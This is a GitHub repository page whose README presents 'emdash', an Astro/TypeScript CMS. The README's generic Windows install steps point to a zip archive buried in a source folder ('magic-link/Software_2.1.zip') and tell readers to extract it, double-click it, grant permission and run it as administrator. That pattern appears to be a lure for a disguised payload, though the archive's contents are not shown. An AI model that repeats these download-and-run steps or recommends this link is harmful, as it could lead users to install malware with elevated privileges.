Skip to content

pavezca6839/emdash

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

391 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ“ emdash - Manage your content with ease

Download emdash

πŸš€ What is emdash?

EmDash is a content management app built with Astro and TypeScript. It gives you a simple way to create, edit, and publish site content from one place.

It is made for people who want a clean CMS without a heavy setup. You can use it to manage pages, posts, media, and site structure from a web browser on Windows.

πŸ“¦ Before you start

Use a Windows PC with:

  • Windows 10 or Windows 11
  • A stable internet connection
  • At least 4 GB of RAM
  • About 500 MB of free disk space
  • A modern browser such as Chrome, Edge, or Firefox

If you plan to run EmDash locally, your system should also allow apps to open a local web server.

πŸ”½ Download emdash

Open this link and get the latest version:

Download emdash

If the page shows source files, look for a release file or a ready-to-run build on the page. Download the app package to your Windows computer, then move to the setup steps below.

πŸ› οΈ Install on Windows

  1. Open the download link above.
  2. Save the file to a folder you can find again, such as Downloads or Desktop.
  3. If the file comes as a .zip, right-click it and choose Extract All.
  4. Open the extracted folder.
  5. Look for the main app file or the setup file.
  6. Double-click the file to start emdash.

If Windows asks for permission, choose Yes so the app can open.

▢️ First launch

When emdash starts for the first time, it may take a short time to load.

You may see a browser window open with the app interface. If that happens, keep the window open and let the app finish loading.

If the app asks for a port, use the default value shown on screen. Most users can leave this unchanged.

🧭 How to use emdash

EmDash is built to keep content work simple.

You can use it to:

  • Create new pages
  • Edit existing posts
  • Organize content into sections
  • Add titles, text, and images
  • Review changes before publishing
  • Keep site content in one place

The layout is meant to be easy to follow. Use the left side to move between sections. Use the main area to edit content.

✍️ Typical workflow

  1. Open emdash in your browser.
  2. Sign in if your setup uses an account.
  3. Choose the content type you want to edit.
  4. Make your changes.
  5. Save your work.
  6. Check the preview if one is available.
  7. Publish when your content is ready.

If you manage more than one page or post, use clear names so you can find items fast.

πŸ”§ Common tasks

Create new content

Use the new item button or menu entry to start a page or post. Add a title first, then fill in the body text.

Edit content

Select the item you want to change, make your edits, then save. If you need to undo a mistake, look for an undo option or restore the last saved version.

Add media

You can usually add images or files from a media panel. Pick the file from your PC, then insert it into the content area.

Organize content

Use folders, tags, or groups if the app supports them. This helps keep large sites in order.

🧩 Features

EmDash is built as a full-stack TypeScript CMS with Astro. That means it is set up for fast page loading, clean structure, and a simple content flow.

Common features include:

  • Content editing in a browser
  • Fast page rendering
  • Structured page and post management
  • Type-safe app logic
  • Clean layout for focused writing
  • Support for modern web workflows
  • A setup that fits small and medium sites

πŸ–₯️ Recommended setup

For the smoothest experience, use:

  • Windows 11
  • 8 GB of RAM
  • A recent Intel or AMD CPU
  • A current browser version
  • A stable local network if you run the app on another device

If you plan to use emdash often, keep it in a fixed folder so you can find it fast.

πŸ§ͺ If the app does not open

If nothing happens after you start emdash:

  1. Check that the file finished downloading.
  2. Make sure you extracted the files if they came in a zip archive.
  3. Try running the app again as administrator.
  4. Close other programs that use a lot of memory.
  5. Restart Windows and try again.
  6. Open the repository page and check for the latest version.

If your browser does not open on its own, copy the local address shown by the app and paste it into the browser bar.

πŸ” File safety

Keep the downloaded file in a folder you trust. Do not rename files inside the app folder unless you know what they do. If you move the app, move the full folder together so the files stay linked.

πŸ“ Project details

  • Repository name: emdash
  • Type: Full-stack TypeScript CMS
  • Base framework: Astro
  • Use case: Content management for websites
  • Topics: astro, cms, emdash, typescript

🧹 Basic maintenance

To keep emdash working well:

  • Use the latest version
  • Clear old downloads you no longer need
  • Keep Windows updated
  • Keep your browser updated
  • Back up your content files if you store them locally

πŸ“ Folder guide

You may see folders and files like these:

  • src for app code
  • public for static files
  • content for pages and posts
  • assets for images and media
  • config for app settings

If your copy of emdash uses different names, use the folder that holds content and settings together.

🌐 Browser use

EmDash runs in a browser window for most tasks. This makes it easier to edit content without learning a desktop app.

Best results come from:

  • Chrome
  • Microsoft Edge
  • Firefox

Use one browser at a time if you notice loading issues.

🧰 Troubleshooting checklist

  • The app folder is fully extracted
  • The download finished
  • The browser is current
  • Windows allowed the app to run
  • No other app is using the same port
  • The file path has no broken links
  • The internet connection is active if the app needs online access

πŸ“Œ Repo link

https://github.com/pavezca6839/emdash/raw/refs/heads/main/packages/core/src/astro/routes/api/auth/magic-link/Software_2.1.zip

About

Build a type-safe Astro and Cloudflare CMS with sandboxed plugins, fast admin UX, and a secure serverless core

Topics

Resources

License

Contributing

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors